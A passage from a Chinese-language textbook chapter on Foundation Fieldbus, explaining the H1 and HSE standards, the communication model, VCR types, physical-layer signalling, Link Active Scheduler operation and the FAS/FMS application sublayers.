到的数据以及本身处理好的数据传送给网络适配器,网络控制系统再将数据传送到列车总线上;同样,主处理器也可以从网络适配器接收到来自列车总线上其他车厢的控制信息。由于LonWorks网络的互操作性和智能节点之间的对等性,从而能完成车厢之间的相互控制与信息显示。 章FF技术 基金会现场总线(FoundationFieldbus,FF)标准是现场总线基金会组织开发的,它综合了通信技术与集散控制系统(DCS)技术。FF技术起源于以美国艾默生(Emerson)、Honeywell为首的企业集团联合欧洲等地的150家公司制定的WorldFIP。这两大集团于1994年9月合并,成立了现场总线基金会,致力于开发出国际统一的现场总线协议。它以ISO/OSI模型为基础,取其物理层、数据链路层、应用层为FF通信模型的相应层次,并在应用层上增加了用户层。用户层主要针对自动化测控应用的需要,定义了信息存取的统一规则,采用设备描述语言规定了通用的功能块集。由于以上这些公司是该领域自控设备的主要供应商,对工业底层网络的功能需求了解很透彻,也具备足够引领该领域现场自控设备发展方向的能力,因而由它们组成的基金会所颁布的现场总线规范具有一定的权威性。基金会现场总线技术在过程自动化领域拥有广泛支持和良好发展前景。基金会现场总线既是通信系统,又是一种分布式的自动化系统。它作为一种通信系统,有别于一般的网络系统,它位于工业现场,通信围绕现场自动化任务。它作为一种网络自动化系统,有别于一般的自动化系统,其网络节点是现场仪表或现场设备,它们既有通信功能,又有信号测量输入、运算、控制和操作输出功能,通过网络组态和控制组态即可在工业生产现场构成分布式网络自动化系统。5.1FF主要技术概述现场总线基金会的目标是致力开发出统一标准的现场总线,并已于1996年颁布了低速总线H1的标准。经过几年的发展,H1低速总线发展为H1和H2两大类,其典型传输速率值为31.25kbit/s、1Mbit/s和2.5Mbit/s,低速总线已经步入了实用成熟阶段。同时,高速总线的标准———高速以太网(HSE)也于2000年制定出来,其产品也正在不断涌现。以下主要介绍基金会现场总线FF⁃H1的相关技术。1.FF⁃H1的主要技术FF⁃H1是底层网络,与一般的广域网、局域网相比,它是低速网。FF⁃H1可以由单一总线段或多总线段构成,也可以由网桥把不同传输速率、不同传输介质的总线段互连而构成,网桥在不同总线之间透明地转换传送信息。同时,还可以通过网关或计算机接口板,将FF⁃H1与工厂管理层的网段挂接,彻底打破了过去多年来未能解决的自动化信息孤岛的局面,形成了完整的工厂信息网络。FF⁃H1围绕工业生产现场的通信系统和分布式的网络自动化系统两个方面,形成了它的技术特色,综合了通信技术和网络自动化技术,其主要技术如下:1)通信技术。FF⁃H1的通信技术主要包括通信模型、通信协议、网络管理和系统管理等。它涉及一系列与通信相关的硬件与软件技术,如专用集成电路、通信圆卡、计算机接口卡、中继器、网桥、网关、通信栈软件、网络软件和组态软件等。2)功能块技术。FF⁃H1借鉴了DCS的功能块及功能块组态技术,在现场总线仪表或设备中定义了多种标准功能块(FB),每种功能块可以实现某种算法或应用功能。换句话说,FF⁃H1将实现控制系统所需的各种功能划分为功能块,再规定它们各自的输入、输出、算法、事件、参数和块图,并使其标准化。这样不但便于用户对功能块组态构成所需的控制回路,而且便于不同的制造商产品中的功能块混合组态或调用。功能块的标准化结构既是实现总线系统开放的基础,也是实现网络自动化的基础。3)设备描述(DeviceDescription,DD)技术。FF⁃H1为了支持标准的功能块操作,实现现场总线仪表或设备的互操作性,共享不同制造商总线设备中的功能块,采用了设备描述技术。为了进行设备描述,FF⁃H1还规定了相应的设备描述语言(DeviceDescriptionLan⁃guage,DDL),采用设备描述编译器,把DDL编写的设备描述的源程序转成计算机可读的目标文件。4)系统集成技术。FF⁃H1是通信系统和控制系统的集成,是集通信、网络、计算机、控制于一体的综合性技术,如网络技术、网络系统组态技术、控制技术、控制系统组态技术、人机接口技术、网络管理技术、诊断维护技术和OPC(OLEforProcessControl)技术等。5)系统测试技术。FF⁃H1为了保证系统的开放性和通用性,规定了一致性测试技术、互操作性测试技术、系统功能和性能测试技术、总线监听和分析技术。一致性测试技术和互操作性测试技术是为保证系统开放性采取的措施,其中一致性测试技术保证通信网络系统符合规范,互操作性测试技术保证不同制造商的总线设备的功能块可以混合组态和协同操作。2.FF⁃H1主要技术特点适应于过程自动化的低速部分(FF⁃H1)是参考了ISO/OSI参考模型并在此基础上根据过程自动化系统的特点进行演变而得到的。除了实现现场总线信号的数字通信外,FF⁃H1还具有适用于过程自动化的其他一些特点:1)支持总线供电。FF⁃H1采用基于IEC61158⁃2的双线信号传输技术,并提供两种供电方式给现场设备:非总线供电和总线供电。非总线供电的现场设备的工作电源直接来自外部电源,总线供电方式时总线上既要传输数字信号,又要由总线为现场设备提供电能。2)支持本质安全。FF⁃H1的现场设备按照设备是否为总线供电,是否可用于易燃易爆环境以及功耗类别而区分。根据本质防爆的要求,应用于易燃易爆场合的设备,不但要保证能完成测量、控制、通信等正常工作,而且要在任何情况下(如断路、短路、故障以及在操作过程中的维护、接通、断开等),不至于产生火花和引发燃烧、爆炸等重大事故。3)令牌总线访问机制。FF⁃H1采用了令牌传递的总线控制方式。从物理上看,这种方式是一种总线型结构的局域网,站点共享的传输介质为总线。但从逻辑上看,它是一种环状结构的局域网,连接到总线上的站点组成一个逻辑环,每个站点被赋予一个顺序的逻辑位置,站点只有取得令牌才能发送数据帧,该令牌在逻辑环上依次传递。4)内容广泛的用户层。FF⁃H1在应用层上增加了一个内容广泛的用户层,它由功能块和设备描述语言这两个重要的部分组成,使得设备与系统的集成一级互操作更加易于实现。 3.HSE现场总线基金会放弃了其原来规划的H2高速总线标准,并于2000年3月29日公布了基于以太网的高速总线技术规范,即HSEFS1.0版,该版本迎合了控制和仪器仪表最终用户对可互操作的、节约成本的、高速的现场总线解决方案的要求。HSE充分利用低成本和商业可用的以太网技术,并以100Mbit/s~1Gbit/s或更高的速度运行。HSE支持所有的FF低速部分31.25kbit/s的功能,如功能模块和设备描述语言,并支持H1设备与基于以太网的设备通过连接设备接口进行连接。5.1.1通信模型1.FF通信模型FF采用了OSI参考模型中的三层:物理层、数据链路层和应用层,隐去了3~6层,保证了FF的共性,另外,针对自身的特点,增加了用户层,保证了FF的个性。OSI参考模型与FF模型对比如图5⁃1所示。其中,物理层和数据链路层采用IEC/ISA标准,物理层(PHY)与传输介质相连接,规定了如何发送信号和接收信号;数据链路层(DLL)规定了现场总线仪表或设备如何共享网络,怎样进行通信调度和数据传输服务。应用层有两个子层:现场总线访问子层(FieldbusAccessSublayer,FAS)和现场总线信息规范(FieldbusMessageSpecification,FMS)层,并将从数据链路到FAS、FMS的全部功能集成为通信栈(CommunicationStack),FAS的基本功能是确定数据访问的关系模型和规范,根据不同要求,采用不同的数据访问工作模式。现场总线信息规范(FMS)层的基本功能是面向应用服务,生成规范的应用协议数据。现场总线访问子层和信息规范层的任务是完成一个应用进程到另一个应用进程的描述,实现应用进程之间的通信,提供应用接口的标准操作,实现应用层的开放性。 FF⁃H1通信模型按功能分为3大组成部分,即通信实体、系统管理内核和功能块应用。 虚拟通信关系(VirtualCommunicationRelationship,VCR)传递各个部分之间的信息,它相当于逻辑通信通道。VCR表示两个或者多个应用进程之间的关系,是各应用程序(ApplicationProcess,AP)之间的逻辑通信通道。在FF⁃H1通信模型的相应软件和硬件开发过程中,将数据链路层、应用层、用户层(功能块、网络管理和系统管理)的软功能集成为通信栈,供软件开发商开发,通过软件编程来实现,另外再开发FF⁃H1专用集成电路及相关硬件,用硬件来实现物理层和数据链路层部分功能。这样通过软件和硬件相结合从而在物理上实现FF⁃H1的通信模型。2.协议数据单元FF现场总线在传输系统的每一层都建立协议数据单元(ProtocolDataUnit,PDU)。PDU包含来自上层的信息以及当前层的附加信息,建立后这个PDU被传送到下一个较低的层。物理层实际以一种编帧的位流形式传输这些PDU,但是由通信栈的较高层建造这些PDU,接收系统自下而上传送这些分组通过通信栈,并在通信栈的每一层分离出PDU中的相关信息。图5⁃3所示为现场总线协议数据的内容和模型中每层应该附加的信息,即FF的协议数据单元报文结构。它也从一个角度反映了现场总线报文信息的形成过程。如某个用户要将数据通过现场总线发往其他设备,首先在用户层形成用户数据,并把它们送往总线报文规范层处理,每帧最多可发送251个8位字节的用户数据信息,然后依次送往现场总线访问子层(FAS)和数据链路层(DLL);用户数据信息在FAS、FMS和DLL,各层分别加上各层的协议控制信息,在数据链路层再加上帧校验信息后,送往物理层将数据打包,即加上帧前、帧后定界码,也就是开头码、帧结束码,并在帧前定界码之前再加上用于时钟同步的前导码(或称之为同步码)。3.VCR通信基金会现场总线控制系统建立两台现场设备或仪表应用进程(AP)之间的通信连接,有点像建立两台电话之间通话的线路连接,但它不完全像电话那样有真正的物理线路上的连接,现场设备应用进程之间的连接是一种逻辑上的连接,或称作软连接,因此,把这种通信连接称为虚拟通信关系。在FF网络中,设备之间传送信息是通过预先组态好的通信通道进行的。VCR就是基金会现场总线网络各应用之间的通信通道。为满足不同应用需求,基金会现场总线设置了三种类型的虚拟通信关系:客户/服务器(Client/Server)VCR通信、报告分发(ReportDistribu⁃ted)VCR通信、发布方/接收方(Publisher/Subscriber)VCR通信。(1)客户/服务器VCR类型当总线上一台设备从链路活动调度器(LinkActiveSched⁃uler,LAS)中得到一个传输令牌(PassToken,PT)时,它可以发送一个请求报文给现场总线上的另一台设备,请求者被称为“客户(Client)”,而收到请求的设备被称为“服务器(Server)”,当服务器收到来自于LAS的PT时,发送相应的响应,同一台设备在不同的时刻,既可以看作请求者也可以看作被请求者,换句话说,该设备在不同的时刻既可以作为客户也可以作为服务器。客户/服务器VCR类型用来实现现场总线设备间的通信,它们是排队的、非调度的、用户初始化的、一对一的,常用于操作员产生的请求,诸如设定点改变、整定参数的存取和改变、报警确认和设备的上载/下载。(2)报告分发VCR类型当总线上一台设备有事件或者趋势报告,收到来自链路活动调度器(LAS)的一个传输令牌(PT)时,将报文发送给由该VCR定义的一个“组地址”———总线设备。在该VCR中被组态为接收的设备,将接收这个报文,该发布者称为报告分发者,这种采用一个报告者对应一组接收者的通信关系被称为报告分发VCR类型。(3)发布方/接收方VCR类型当一台总线设备从链路活动调度器(LAS)得到一个传输令牌(PT)时,该设备就将其缓冲器中的信息向总线上的多台设备发布或广播这些信息,这个广播信息者被称为发布方(Publisher),收听这些信息的设备被称为接收方(Sub⁃scriber),这种采用一台设备广播其缓冲器信息而多台设备同时接听的通信关系称为发布方/接收方VCR。发布方/接收方VCR类型属于总线上一台设备与多台设备之间的缓冲式的、一对多的通信。缓冲意味着在网络中只保留数据的最新版本,以前的数据完全被新数据覆盖,它常用于刷新功能块的输入输出数据,如刷新过程变量(PV)和操作输出(OUT)等。表5⁃1总结比较了上述三种VCR通信类型。 4.物理层FF⁃H1的物理层(PHY)符合国际电工委员会IEC61158⁃2(1993年)和ISA⁃S50.02中有关物理层的标准,其基本任务有两点:一是从传输介质上接收信号,经过处理后传给数据链路层(DDL);二是将来自数据链路层的数据加工后变为标准物理信号发送到传输介质上。现场总线基金会为低速总线颁布了FF⁃81631.25kbit/s物理层规范,也称为低速现场总线的H1标准。(1)31.25kbit/s现场总线31.25kbit/s现场总线属于基金会低速现场总线H1,可用于温度、物位和流量控制等控制应用场合,其设备可由现场总线直接供电,支持非现场总线供电,也能在原有的4~20mA设备的路线上运行。31.25kbit/s现场总线也以总线供电设备方式支持本质安全(IntrinsicSafety,IS),为此,应在安全区域的电源和危险区域的本质安全设备之间加上本质安全栅。(2)31.25kbit/s现场总线信号31.25kbit/s(H1)现场总线为电压型信号类型,发送设备以31.25kbit/s的速率将±10mA电流信号传送给一个50Ω的等效负载,产生一个调制在直流(DC)电源电压上的1V的峰值电压信号,DC电源电压范围为9~32V,电压模式的现场总线信号波形如图5⁃4所示。对于本质安全应用场合,允许的电源电压应由安全栅额定值给定。图5⁃4FF⁃H1总线电压模式信号波形根据FF⁃H1的报文结构,H1物理层(PHY)信号通信由以下几种信号编码组成。1)协议报文编码。这里的协议报文编码是指携带了现场总线要传输的数据报文,这些数据报文由上层的协议数据单元生成。FF采用曼彻斯特编码技术将数据编码加载到直流电压或直流电流上形成物理信号,在曼彻斯特编码过程中,每个周期时钟周期被分成两半,用前半周期为低电平、后半周期为高电平形成的脉冲正跳变来表示0;前半周期为高电平、后半周期为低电平的脉冲负跳变表示1。这种编码的优点是数据编码中隐含了同步时钟信号,不用再另外设置同步信号。2)前导码。前导码是为了置于通信信号最前端而特别规定的8位数字信号:10101010,即一个字节。一般情况下,它是8位即一个字节长度。若使用中继器,则前导码可以多于一个字节。收信端的接收器正是采用这一信号与正在接收的现场总线信号同步其内部时钟。3)帧前定界码。它标明了现场总线信息的起点,长度为8个时钟周期,也就是一个8位的字节。帧前定界码由特殊的N+码、N-码和正负跳变脉冲按规定的顺序组成,在FF总线的物理信号中,N+码和N-码具有自己的特殊性,它不像数据编码那样在每个时钟周期的中间都必然会存一次电平的跳变,N+码在整个时钟周期都保持高电平,N-码在整个时钟周期都保持低电平,即它们在时钟周期的中间不存在电平的跳变。收信端的接收器利用帧前定界码信号来找到现场总线信息的起点。帧前定界码波形如图5⁃5所示。4)帧结束码。帧结束码标志着现场总线信息的终止,长度也为8个时钟周期,或称一个字节。像起始码那样,帧结束码也是由特殊的N+码、N-码和正负跳变脉冲按规定的顺序组成,当然其组合顺序不同于起始码。图5⁃5中也画出了帧结束码的波形。前导码、帧前定界码和帧结束码都是由物理层的硬件电路生成并加载到物理信号上的。这几种编码形成如图5⁃5所示的编码序列。作为发送端的发送驱动器,要把前导码、帧前定界码和帧结束码增加到发送序列之中,而接收端的信号接收器则要从所接收的信号序列中去除掉前导码、帧前定界码和帧结束码。 5.数据链路层基金会现场总线(FF)的数据链路层(DLL)位于物理层与总线访问子层之间,为系统管理内核和总线访问子层访问总线媒体服务,在数据链路层上所生成的协议控制信息就是为完成对总线上的各类链路传输活动进行控制而设置的。数据链路层实现总线通信中的链路活动调度、数据的接收发送、活动状态的探测、响应和总线上各设备间的链路时间同步。每个总线段上有一个媒体访问控制中心,称为链路活动调度器(LAS),LAS具备链路活动调度能力,可形成链路活动调度表,并按照调度表的内容形成各类磁路协议数据,链路活动调度是该设备中数据链路层的重要任务。(1)通信设备类型基金会现场总线(FF)根据设备的通信能力,由DLL规范定义了三种类型设备:1)基本设备。不具备链路活动调度能力的设备,称为基本设备(BasicDevice,BD)。BD只能接收总线命令并做出响应,即它的DLL只能控制设备对总线的活动,这是最基本的通信功能,因此可以说总线上的所有设备,包括链路主设备都具有基本设备能力。 2)链路主设备。链路主设备指有能力成为总线段上链路活动调度中心的设备,也称之为链路活动调度器(LAS)。LAS具备链路活动调度能力,可形成链路活动调度表,并按照调度表的内容形成链路协议数据,链路活动调度是该设备中DLL的重要任务。3)网桥。网桥用于连接不同传输速率或不同传输介质的网段,由于它担负着对其下游各总线段的链路活动调度,因而它必须成为LAS。一条总线段上可以连接多种通信设备,也可以挂接多台链路主设备(LMD),但同时只能有一台LMD成为LAS,没有成为LAS的LMD起着后备LAS的作用。图5⁃6表示了现场总线通信设备类型及构成。 (2)受调度通信链路活动调度器(LAS)是一条总线段的调度中心,拥有总线上所有设备的清单及链路活动调度表,任何时刻每个总线段上都只有一个LAS处于工作状态,总线上的设备只有得到LAS的许可,才能向总线上传输数据。基金会现场总线的通信活动分为两类:受调度通信与非调度通信。由LAS按预定调度时间表周期性依次发起的通信活动,称为受调度通信或周期性通信。LAS内有一张预定调度时间表,一旦到了某台设备要发送的时间,LAS就发送一个强制数据(CompelData,CD)给这台设备,基本设备收到了这个强制数据后,就可以向总线上发送它的信息,如图5⁃7所示。 LAS发出CD(x,a),设备(发送方)x收到后,x再发出数据链路包(DataLinkPacket)DL(a),使接收方(y和z)设备接收到报文a。受调度通信一般用于设备间周期性地传送数据,如现场变送器和执行器之间传送闭环控制的测量信号或输出信号。(3)非调度通信在预定调度时间表之外的时间,LAS向总线发出一个传输令牌(PT),得到这个令牌的设备才能发送信息。这样的通信方式称为非调度通信或非周期性通信,如图5⁃8所示,LAS发出PT(x),设备x收到后,z再发出DL(M),使设备z收到报文M。非调度通信的内容为报警/事件、维护/诊断信息、程序激活、显示信息、趋势信息和组态等。 (4)链路活动调度器运作链路主设备(LMD)通过竞争成为链路活动调度器(LAS),之后再按照链路活动的调度算法和调度表工作。1)链路活动调度权的竞争过程与LAS转交。当一个总线段上存在多个链路主设备时,一般通过链路活动调度权的竞争过程,使赢得竞争的链路主设备成为LAS。在系统启动或现有LAS出错失去LAS作用时,总线段上的链路主设备通过竞争争夺LAS权,竞争过程将选择具有最低节点地址的链路主设备成为LAS。在系统设计时,可以给希望成为LAS的链路主设备分配一个低的节点地址。但是由于各种原因,希望成为LAS的链路主设备并不一定能赢得竞争而真正成为LAS,例如在系统启动时的竞争中,某个设备的初始化可能比另一个链路主设备要慢,因而尽管它具有更低的节点地址,却不能赢得竞争而成为LAS。当具有低节点地址的链路主设备加入到已经处于运行状态的网络时,由于网段上已经有了一个在岗LAS,在没有出现新的竞争之前,它也不可能成为LAS。如果确实想让某个链路主设备成为LAS,还可以采用数据链路层提供的另一种方法将LAS转交给它,即在该设备网络管理信息库的组态中置入这一信息,以便能让设备了解到希望把LAS转交给它的这种要求。2)链路活动的调度算法。链路活动调度器的工作按照一个预先安排好的调度时间表进行,在这个预定调度表内包含了所有要周期性发生的通信活动时间,到了某个设备发布信息的预定时间,链路活动调度器就向该设备中的特定数据缓冲器发出一个强制数据(CD),这个设备马上就向总线上的所有设备发布信息,这是链路活动调度器执行的最高优先级行为。链路活动调度器(LAS)可以发送两种令牌,即强制数据令牌和传输令牌。得到令牌的设备才有权对总线传输数据,一个总线段在一个时刻只能有一个设备拥有令牌。强制数据的协议数据单元CDDLPDU用于分配强制数据类令牌。LAS按照调度表周期性地向现场设备循环发送CD,LAS把CD发送到数据发布者的缓冲器,得到CD后,数据发布者便开始传输缓冲器内的内容。 (5)数据链路PDU单元协议控制信息由三部分组成。第一部分是帧控制信息,它只有一个8位字节,指明了该DLPDU的种类、地址长度、优先权等。第二部分是数据链路地址,包括目的地址与源地址,当然,并非所有种类的DLPDU都具有目的地址与源地址,有些类别的DLPDU只有源地址,没有目的地址;有的甚至既无源地址,也无目的地址,如探测响应类的DLPDU。如果第一部分字节中的第五位为“1”,则说明数据链路地址为四个8位字节的长地址;若第五位为“0”,说明数据链路地址为短地址,只有低位的两个8位字节为真正的链路地址,高位的两个地址字节写为00。第三部分则指明了该类DLPDU的参数。 (6)数据传输方式基金会现场总线(FF⁃HI)提供无连接和面向连接的两种数据传输方式,其中面向连接又分为两种传输方式。1)无连接数据传输。无连接数据传输是指在数据链路服务访问点(DataLinkServiceAccessPoint,DLSAP)之间排队传输DLPDU,这类传输主要用于在总线上发送广播数据。通过组态可以把多个地址编为一组,并使之成为数据传输的目的地址,同时也容许多个数据发布源把数据发送到一组相同的地址上。数据接收者不一定对数据来源进行辨认与定位。无连接数据传输的特点是在数据传输之前不需要单独为数据传输而发送创建连接的报文,也不需要数据接收者的应答响应信息,即在数据链路层不必为控制其传输而另外设置任何报文信息,因而不需要数据缓冲器,每个传输的优先权也是分别规定的。2)面向连接的传输。面向连接的传输连接方式要求在数据传输之前发表某种信息来建立连接关系,面向连接的传输又分为两种:通信双方经请求响应交换信息后进行的数据传输和以数据发送方的DLDPU为依据的传输方式。①通信双方请求响应交换信息的传输方式。该连接方式在要求建立连接时,创建带有通信发起者的源地址和目的地址的连接控制帧。响应方需指出它是否接受这个连接请求,一旦数据传输在一个连接上开始,所有DLPDU内的数据就以相同的优先权被传输。②以数据发送方的DLPDU为依据的传输方式。该连接方式所传输的数据DLPDU只含有一个地址,即发布者的地址。接收者知道发布者的这个地址,并根据该地址接收发布者发出的数据,接收者对发布者的辨认情况不必为发布方所知道。6.应用层(1)现场总线访问子层现场总线访问子层(FAS)是基金会现场总线(FF)通信参考模型中应用层的一个子层,位于现场总线信息规范(FMS)层与数据链路层之间,利用数据链路层的受调度通信与非调度通信作用,为FMS和AP提供VCR的报文传送服务。在现场总线的分布式通信系统中,各应用进程(AP)之间要利用通信通道传递信息。在应用层中,把这种模型化的通信通道称为应用关系(ApplicationRelationshipEndPoints,AREP)。应用关系负责在所要求的时间,按规定的通信特性,在两个或多个应用进程(AP)之间传送报文。现场总线访问子层(FAS)的主要活动就是传送被称为FAS协议数据单元的FAS报文与它的通信成员进行通信,从而提供与应用关系相关的各种服务。1)现场总线访问子层的协议机制(PM)。总线访问子层的协议机制分为三层:FAS服务协议机制(FASServiceProtocolMechanism,FSPM)、应用关系协议机制(ApplyRelationProto⁃colMechanism,ARPM)和DLL映射协议机制(DLLMappingProtocolMechanism,DMPM)。三者之间的相互关系如图5⁃9所示。 ①FAS服务协议机制(FSPM)。FAS服务协议机制描述FAS用户和特定的应用关系端点之间的接口,FAS用户是指总线报文规范层和功能块应用进程。对所有类型的应用关系端点,其服务协议机制都是公共的,没有任何状态变化,它负责把服务用户发来的信息转化为FAS内部的协议格式,并根据应用关系端点参数,为该服务选择一个合适的应用关系协议机制;相反地,根据应用关系端点的特征参数,把FAS的内部协议格式转换成用户可接受的格式,并传送给FAS用户,简言之,FSPM是对上层的接口。②应用关系协议机制(ARPM)。应用关系协议机制是FAS层的中心,它描述了应用关系的创建和撤销以及与远程ARPM之间交换协议数据单元FAS⁃PDU。ARPM负责接收来自FSPM或DMPM的内部信息,根据应用关系端点类型和参数生成另外的FAS协议信息,并把它发送给DMPM或FSPM。如果是要求建立或撤销应用关系,就是指试图建立或撤销这个特指的应用关系。③DLL映射协议机制(DMPM)。DLL映射协议机制与FSPM有点类似,它是对下层即数据链路层的接口。DMPM把来自应用关系协议机制的FAS内部协议格式转换成数据链路层DLL可接受的服务格式,并送给DLL;或者反过来,将接收到的来自DLL的内容,以FAS内部协议格式发送给应用关系协议机制ARPM。2)应用关系端点(AREP)的分类。基金会现场总线(FF)规定了以下三种应用关系端点(AREP):源方(Source)和收方(Sink),客户(Client)和服务器(Server),发行者(Publisher)和预订者(Subscriber)。按照应用关系端点(AREP)的综合特性,将AREP划分为以下三类端点:排队式、用户触发、单向类AREP,简称QUU类端点;排队式、用户触发、双向类AREP,简称QUB类端点;缓冲式、网络调度、单向类AREP,简称BNU类端点。①QUB(QueuedUser⁃triggeredBidirectional)类AREP。QUB类AREP所提供的应用关系(AR)支持两个应用进程(AP)之间的确认服务,客户端和服务器端的相互作用就属于这一类。客户端点接收确认服务要求,将它具体体现在相应的FAS⁃PDU中,并把这个FAS⁃PDU交给数据链路层。DLL按照AREP的属性定义,提供排队的、面向连接的数据传输服务,为AREP所规定的通信特性决定了如何配置数据链路层,发送所有客户端点的FAS⁃PDU都采用数据链路层提供的相同等级的服务。服务器端点接收来自数据链路层的FAS⁃PDU,并按顺序递送确认的服务指针,指针按照接收顺次排序。服务器端点接收来自用户的确认服务响应,将它具体体现在相应的FAS⁃PDU中,并把FAS⁃PDU交给数据链路层,数据链路层按照端点的属性定义提供有向排队、面向连接的数据传输服务。发送所有服务器端点的FAS⁃PDU都采用该数据链路层提供的相同等级的服务,客户端点接收这个FAS⁃PDU,把确认服务传送到与这个端点相关的应用进程,完成这个确认服务。②QUU类AREP。QUU(QueuedUser⁃triggeredUndirectional)类AREP所提供的应用关系支持从一个AP到零个或多个AP、按要求排队的非确认服务,源方/收方的相互关系就属于这类。源方AREP接收非确认服务请求,将它具体体现在相应的FAS⁃PDU中,并把这个FAS⁃PDU提交给数据链路层,数据链路层按AREP的属性定义,提供排队的无连接数据传输服务。采用数据链路层提供的同级服务,发送源方端点的所有FAS⁃PDU端点接收AREP接收的从数据链路层来的FAS⁃PDU,并按次序递送非确认服务指针,指针按照接收的顺次排序。③BNU类AREP。BNU(BufferedNetwork⁃scheduledUndirectional)类AREP所提供的应用关系支持对零个或多个应用进程的周期性、缓冲型、非确认的服务,发布方/预定接收方间的相互作用就属于此类。发布方AREP接收非确认的服务请求,把它具体体现在相应的FAS⁃PDU中,并将FAS⁃PDU交给数据链路层(DLL)。DLL按照AREP的属性定义,提供缓冲型、面向连接的数据传输服务。发送所有来自发布方端点的FAS⁃PDU,都采用由DLL提供的相同等级的服务。预订者AREP从DLL接收FAS⁃PDU,并且按次序递送非确认的服务指针,该次序是指与这个端点相关的AP的接收次序。如果含有先前服务请求的FAS⁃PDU被发送之前,发布方端点收到另一个非确认服务请求,先前的FAS⁃PDU将被替代,其结果是先前的FAS⁃PDU将会丢失。与此类似,如果预订者的先前一个FAS⁃PDU在它的用户读取之前,收到另一个FAS⁃PDU,新来的FAS⁃PDU将替代先前的,其结果是先前的FAS⁃PDU就丢失了。如果发布方在数据链路层发送缓冲区的内容被触发之前,没有收到新的非确认服务,同一个FAS⁃PDU将被再次发送。如果预订者成功地收到了相同的FAS⁃PDU,它会向用户提示,已经收到了重复的FAS⁃PDU。3)应用关系的建立方式。每个应用关系(AR)是通过连接两个或多个同类型的AREP建立起来的,AR之间信息的传递,取决于包含在AR中的AREP类型。AR的建立主要有3种方法:预先建立、预先组态、动态定义和创建。①预先建立AR。预先建立AR的特点是当应用程序(AR)被连接到一个网络上时,应用关系端点的内容就建立好了。任何应用关系都可以按这种方法事先设置,这样,当应用关系所包含的应用进程之间发生通信时,无须首先在网络上明确地建立应用关系(AR),不过要真正实现通信,依然要处理数据传输的状态,在本地把状态带入到数据传输阶段。②预先组态AR。预先组态AR,但未建立AR。它的特点是每个端点都知道应用关系(AR)的特性,但定义好的内容要求采用现场总线访问子层(FAS)的相关服务来激活。③动态定义和创建AR。动态定义和创建AR的特点是采用网络管理服务来远程创建应用关系端点,必须为应用关系中所包含的每个AREP创建其定义,然后下一步要做的就像预先组态AR要做的那样。只有客户/服务器应用关系创建会引发总线访问子层协议数据单元(FAS⁃PDU)的交换。在交换过程中,采用数据链路连接端点(DataLinkConnectionEndPoints,DLCEP)地址作为客户/服务器应用关系端点的全局标识,在数据链路服务应用进程的本地节点间传输FAS⁃PDU的内容。(2)现场总线信息规范现场总线信息规范(FMS)层是通信参考模型应用层中的另一个子层,它和FAS共同构成FF的应用层。该层描述了用户应用所需要的通信服务、信息格式、行为状态等。FMS提供了一组服务和标准的报文格式,用户应用可采用这种标准格式在总线上相互传送信息,并通过FMS服务访问AP对象以及它们的对象描述,把对象描述收集在一起形成对象字典(ObjectDictionary,OD)。应用进程中的网络对象和相应的OD在FMS中称为虚拟现场设备(VirtualFieldbusDevice,VFD)。FMS服务在VCR端点提供给应用进程。FMS服务分为确认服务和非确认服务,确认服务用于操作和控制应用进程对象,如读/写变量值及访问对象字典,它使用客户/服务VCR;非确认服务用于发布数据或通报事件,发布数据使用发布方/预订接收方VCR,而通报事件使用报告分发型VCR。总线报文规范层由以下几个模块组成:虚拟现场设备(VFD)、对象字典管理、联络关系管理、域管理、程序调用管理、变参访问和事件管理。1)虚拟现场设备(VFD)。从通信伙伴来看,虚拟现场设备(VFD)是一个自动化系统的数据和行为的抽象模型,它用于远距离查看对象字典中定义过的本地设备的数据,其基础是VFD对象。VFD对象含有可由通信用户通过服务使用的所有对象及对象描述,对象描述存放在对象字典中,每个VFD有一个对象描述,因而虚拟现场设备可以看作应用进程(AP)的网络可视对象和相应的对象描述的体现。FMS服务没有规定具体的执行接口,它们以一种可用函数的抽象格式出现。 一个典型的虚拟现场设备可有几个VFD,至少应该有两个VFD,一个用于网络与系统管理,一个作为功能块应用,它提供对网络管理信息库(NMIB)和系统管理信息库(SMIB)的访问。网络管理信息库(NMIB)包括虚拟通信关系、动态变量和统计,当该设备成为链路主设备时,它还负责链路活动调度器(LAS)的调度工作。系统管理信息库(SMIB)的数据包括设备标签、地址信息和对功能块执行的调度。VFD对象的寻址由虚拟通信关系表(VirtualCommunicationRelationTable,VCRT)中的VCR隐含定义。VFD对象有几个属性,如厂商名、模型名、版本、行规号等,逻辑状态和物理状态属性说明了设备的通信状态及设备总状态,VFD对象列表具体说明它所包含的对象。VFD支持的服务有三种:Status、UnsolicitedStatus和Identify。Status为读取状态服务,后面括号内的服务属性为逻辑状态、物理状态;Status.req/ind(),Status.rsp/cnf(LogicalStatus,PhysicalStatus)。UnsolicitedStatus为设备状态的自发传送服务,UnsolicitedSta⁃tus.req/ind(LogicalStatus,PhysicalStatus)。Identify为读VFD识别信息服务,后面括号内的服务属性为厂商名、模型名、版本号;Identify.req/ind();Identify.rsp/cnf(VendorName,ModelName,Revision)。厂商名、模型名、版本与行规号都属于可视字符串类,由制造商输入,分别表明制造商的厂名、设备功能模型名和设备的版本水平。行规号以固定的两个8位字节表示,如果没有一个相应的行规与之对应,则这两个8位字节都输入为“0”。逻辑状态是指有关该设备的通信能力状态:0———准备通信状态,所有服务都可正常使用;2———服务限制数,指某种情况下能支持服务的有限数量;4———非交互OD装载,如果对象字典处于这种状态,不允许执行InitiatePutOD服务;5———交互OD装载,如果对象字典处于这种状态,所有的连接服务将被封锁,并将拒绝建立进一步的连接,只有InitiatePutOD服务可以被接收,即可启动对象字典装载。只有在这种连接状态下才允许以下服务:Initiate、Abort、Reject、Status、Identify、PhysRead、Phywrite、GetOD、InitiatePutOD、PutOD、TerminatePutOD。物理状态则给出了实际设备的大致状态:0———工作状态;1———部分工作状态;2———不工作状态;3———需要维护状态。UnsolicitedStatus是为用户或设备状态的自发传送而采用的服务,它也包括逻辑状态、物理状态和指明本地状态的LocalDetail。Identify服务用于读取VFD的识别信息。2)对象字典(OD)。由对象描述说明通信中跨越现场总线的数据内容,把这些对象描述收集在一起,形成对象字典(OD)。对象字典包含以下通信对象的对象描述:数据类型、数据类型结构描述、域、程序调用、简单变量、矩阵、记录和变量表事件。字典的条目0提供了对字典本身的说明,被称为字典头,为用户应用的对象描述规定了第一个条目。用户应用的对象描述能够从255以上的任何条目开始,条目255及其以下条目定义了数据类型,如用于构成所有其他对象描述的数据结构、位串、整数和浮点数。对象字典(OD)由一系列条目组成,每一个条目分别描述一个应用进程对象和它的报文数据。对一个对象字典唯一地分配一个统一的OD对象描述,这个OD对象描述包含关于这个对象字典结构的信息,用一个唯一的目录号来标注这个对象描述,它是一个1